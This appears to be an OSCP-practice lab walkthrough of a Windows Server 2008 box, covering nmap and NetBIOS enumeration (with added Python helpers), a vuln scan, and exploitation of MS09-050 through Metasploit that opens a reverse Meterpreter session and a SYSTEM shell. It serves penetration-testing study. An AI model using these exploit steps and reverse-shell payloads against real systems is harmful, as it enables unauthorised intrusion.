Internal
Enumeration⌗
NMAP⌗
┌──(kali㉿kali)-[~/Documents/OSCPprep/internal]
└─$ nmap 192.168.193.40 -Pn -oN nmapALL.txt -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-26 03:25 EDT
Nmap scan report for 192.168.193.40
Host is up (0.049s latency).
Not shown: 65522 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
UDP⌗
PORT STATE SERVICE
53/udp open domain
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
500/udp open|filtered isakmp
3702/udp open|filtered ws-discovery
4500/udp open|filtered nat-t-ike
5355/udp open|filtered llmnr
Netbios⌗
NetBIOS (Network Basic Input/Output System) is a session-layer naming and communication API that lets applications on a LAN (originally Ethernet or token ring) find each other and exchange data by NetBIOS name rather than by IP address. On Windows it is carried over TCP/IP (NetBT) on three ports:
- 137/udp: NetBIOS name service (name registration and resolution, including the node status query nbtscan sends)
- 138/udp: NetBIOS datagram service
- 139/tcp: NetBIOS session service (SMB over NetBIOS)
Workgroup: a peer-to-peer Windows network, normally a small number of computers on the same LAN or subnet, with no centralized administration: no computer has control over another, and each user manages resources and security locally on their own system. The target reports the default WORKGROUP name (see the sysinfo output further down), which is consistent with a standalone, non-domain-joined host.
┌──(kali㉿kali)-[~/Documents/OSCPprep/internal]
└─$ nbtscan 192.168.193.40
Doing NBT name scan for addresses from 192.168.193.40
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.193.40 INTERNAL <server> <unknown> 00:50:56:ba:e9:bc
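The nbtscan line above is the decoded answer to a single NetBIOS node status query on UDP/137. The following is an added example (not code from the original page or from nbtscan) that builds that query, parses the NODE STATUS RESPONSE into the name table and MAC, and, so it runs offline, constructs a sample reply that mirrors the result above (unique INTERNAL<00> and <20>, group WORKGROUP<00>, MAC 00:50:56:ba:e9:bc). The sample bytes are constructed, not a capture, and the suffix table covers only the common values.

```python
"""NetBIOS Name Service (UDP/137) node-status query, the packet nbtscan sends.
Added example for this writeup; not code from the original page or from nbtscan."""
import socket
import struct

NBNS_PORT = 137
NBSTAT = 0x0021  # RR type: NODE STATUS request/response (RFC 1002)

# Meaning of the 16th-byte <suffix>, keyed by (suffix, group flag); common values only.
SUFFIXES = {
    (0x00, False): "Workstation Service",
    (0x00, True): "Domain/Workgroup Name",
    (0x03, False): "Messenger Service",
    (0x1B, False): "Domain Master Browser",
    (0x1C, True): "Domain Controllers",
    (0x1D, False): "Master Browser",
    (0x1E, True): "Browser Service Elections",
    (0x20, False): "File Server Service",
}


def encode_name(name, suffix=0x00):
    """First-level encoding (RFC 1001): a 16-byte name becomes 32 chars, each nibble
    mapped to 'A' + nibble. The node-status wildcard is '*' followed by NULs;
    ordinary names are upper-cased and space-padded to 15 bytes plus the suffix."""
    raw = name.encode("ascii")
    raw = raw.ljust(15, b"\x00") if raw == b"*" else raw.upper().ljust(15, b" ")
    raw += bytes([suffix])
    encoded = bytearray()
    for b in raw:
        encoded.append(0x41 + (b >> 4))
        encoded.append(0x41 + (b & 0x0F))
    return bytes([32]) + bytes(encoded) + b"\x00"  # label length, label, terminator


def build_node_status_query(txid=0x1337):
    """12-byte NBNS header (QDCOUNT=1) plus one question for '*' of type NBSTAT."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name("*") + struct.pack(">HH", NBSTAT, 0x0001)


def _skip_name(buf, off):
    """Advance past a label sequence (or a 2-byte compression pointer)."""
    while True:
        ln = buf[off]
        off += 1
        if ln == 0:
            return off
        if ln & 0xC0 == 0xC0:
            return off + 1
        off += ln


def parse_node_status_response(buf):
    """Return the name table and MAC from a NODE STATUS RESPONSE."""
    txid, flags, qd, an, _ns, _ar = struct.unpack_from(">HHHHHH", buf, 0)
    if not flags & 0x8000:
        raise ValueError("not a response packet")
    if flags & 0x000F:
        raise ValueError("NBNS error, RCODE=%d" % (flags & 0x000F))
    if an < 1:
        raise ValueError("no answer record")
    off = 12
    for _ in range(qd):                 # normally 0 in a node-status response
        off = _skip_name(buf, off) + 4  # question name + type + class
    off = _skip_name(buf, off)          # RR_NAME (the '*' name echoed back)
    rtype, _rclass, _ttl, _rdlen = struct.unpack_from(">HHIH", buf, off)
    off += 10
    if rtype != NBSTAT:
        raise ValueError("unexpected RR type 0x%04x" % rtype)
    num_names = buf[off]
    off += 1
    names = []
    for _ in range(num_names):          # 18 bytes each: 15 name, 1 suffix, 2 flags
        raw, suffix, nflags = struct.unpack_from(">15sBH", buf, off)
        off += 18
        group = bool(nflags & 0x8000)   # G bit: group name vs unique name
        names.append({"name": raw.rstrip(b" \x00").decode("ascii", "replace"),
                      "suffix": suffix, "group": group,
                      "role": SUFFIXES.get((suffix, group), "unknown")})
    mac = buf[off:off + 6]              # first field of the STATISTICS block
    return {"txid": txid, "names": names, "mac": ":".join("%02x" % b for b in mac)}


def build_sample_response(txid=0x1337):
    """Constructed reply (not a real capture) mirroring the nbtscan result above."""
    entries = [(b"INTERNAL", 0x00, 0x0400), (b"INTERNAL", 0x20, 0x0400),
               (b"WORKGROUP", 0x00, 0x8400)]
    rdata = bytes([len(entries)])
    for name, suffix, nflags in entries:
        rdata += struct.pack(">15sBH", name.ljust(15, b" "), suffix, nflags)
    rdata += bytes.fromhex("005056bae9bc") + b"\x00" * 40   # MAC, zeroed statistics
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)  # response, AA set
    return header + encode_name("*") + struct.pack(">HHIH", NBSTAT, 1, 0, len(rdata)) + rdata


def query_node_status(host, timeout=2.0):
    """Send the query to a live host on UDP/137 and parse the reply."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_node_status_query(), (host, NBNS_PORT))
        data, _ = sock.recvfrom(4096)
    finally:
        sock.close()
    return parse_node_status_response(data)


if __name__ == "__main__":
    import sys
    result = (query_node_status(sys.argv[1]) if len(sys.argv) > 1
              else parse_node_status_response(build_sample_response()))
    for n in result["names"]:
        print("%-15s <%02x> %s %s" % (n["name"], n["suffix"],
                                      "GROUP " if n["group"] else "UNIQUE", n["role"]))
    print("MAC", result["mac"])
```

Run it with a target IP to query a live host, or with no argument to decode the constructed sample. A <20> unique entry is the file server service, so its presence is what nbtscan reports as "<server>"; a <1C> group entry would indicate a domain controller, which this host does not advertise.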
Version enumeration⌗
Foothold⌗
Checking the discovered services (SMB on 139/445, RDP on 3389) against known exploits turns up a potential remote code execution bug in the SMBv2 negotiate handler in srv2.sys, MS09-050 (CVE-2009-3103), which the nmap vuln scripts also flag as smb-vuln-cve2009-3103. Note that nmap's smb-vuln-cve2009-3103 script is in the dos category and can crash the SMB service on a vulnerable host, so run the vuln category only when that is acceptable on the target.
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-050
┌──(kali㉿kali)-[~/Documents/OSCPprep/internal]
└─$ nmap --script=vuln 192.168.193.40
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-26 05:00 EDT
Nmap scan report for 192.168.193.40
Host is up (0.020s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
|_ssl-ccs-injection: No reply from server (TIMEOUT)
| rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
| Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
| Disclosure date: 2012-03-13
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ http://technet.microsoft.com/en-us/security/bulletin/ms12-020
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
Nmap done: 1 IP address (1 host up) scanned in 75.89 seconds
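The --script=vuln run above was started without a port list, so it scripted only nmap's default top 1000 TCP ports ("Not shown: 987 closed tcp ports"); the seven high RPC ports happened to fall inside that set, but on another host they would be skipped. The following is an added example (not code from the original page) that reads the open ports out of the earlier full-range -oN scan and builds the follow-up script scan from them, optionally excluding dos-category scripts such as smb-vuln-cve2009-3103. The embedded nmap output is a constructed copy of the nmapALL.txt lines above, and the output file name nmapVULN.txt is an assumption.

```python
"""Pick the port list for the nmap script scan from a finished -p- scan.
Added example for this writeup, not part of the original page."""
import re
import shlex
import sys

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

# Constructed sample (the normal-output lines from the nmapALL.txt run above).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.193.40
Host is up (0.049s latency).
Not shown: 65522 closed tcp ports (conn-refused)
PORT      STATE SERVICE
53/tcp    open  domain
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
"""


def open_ports(nmap_output, proto="tcp"):
    """Map open port -> service name from nmap normal (-oN) output.
    Only 'open' rows count; open|filtered and closed rows are dropped."""
    ports = {}
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(2) == proto and m.group(3) == "open":
            ports[int(m.group(1))] = m.group(4)
    return ports


def script_scan_command(target, ports, scripts=("vuln", "smb-os-discovery"),
                        exclude_dos=True, outfile="nmapVULN.txt"):
    """Build the targeted script scan. nmap's --script takes a boolean expression
    over script names and categories, so '(vuln or ...) and not dos' keeps the
    vuln checks but drops the ones that deliberately crash the service."""
    expr = " or ".join(scripts)
    if exclude_dos:
        expr = "(%s) and not dos" % expr
    port_list = ",".join(str(p) for p in sorted(ports))
    return "nmap -sV -Pn -p%s --script %s -oN %s %s" % (
        port_list, shlex.quote(expr), outfile, target)


if __name__ == "__main__":
    # Usage: python3 this.py nmapALL.txt 192.168.193.40  (or no args for the sample)
    if len(sys.argv) > 2:
        with open(sys.argv[1]) as fh:
            text, target = fh.read(), sys.argv[2]
    else:
        text, target = SAMPLE_NMAP_OUTPUT, "192.168.193.40"
    found = open_ports(text)
    for port, svc in sorted(found.items()):
        print("%5d/tcp %s" % (port, svc))
    print(script_scan_command(target, found))
```

Pass exclude_dos=False when you do want the crash-style checks (that is the only way the smb-vuln-cve2009-3103 result above gets produced), and run them last, after the rest of enumeration is done.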
┌──(kali㉿kali)-[~/Documents/OSCPprep/internal]
└─$ searchsploit ms09-050
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) | windows/remote/40280.py
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) | windows/remote/14674.txt
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit) | windows/remote/16363.rb
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
msf6 > search MS09-050
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
1 auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh normal No Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
2 auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff normal No Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) >
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > run
[*] Started reverse TCP handler on 192.168.49.193:4444
[*] 192.168.193.40:445 - Connecting to the target (192.168.193.40:445)...
[*] 192.168.193.40:445 - Sending the exploit packet (951 bytes)...
[*] 192.168.193.40:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (175686 bytes) to 192.168.193.40
[*] Meterpreter session 1 opened (192.168.49.193:4444 -> 192.168.193.40:49159) at 2022-06-26 04:57:44 -0400
meterpreter > sysinfo
Computer : INTERNAL
OS : Windows 2008 (6.0 Build 6001, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter > shell
Process 2480 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Looks like there are a few exploits that might work. I also tried a different exploit script which returned a reverse shell, but it wasn't stable. I tried passing it some shellcode that would execute a command to download a payload from my webserver and get a shell that way, but it never connected back. The exploit was a bit unstable and kept crashing the system.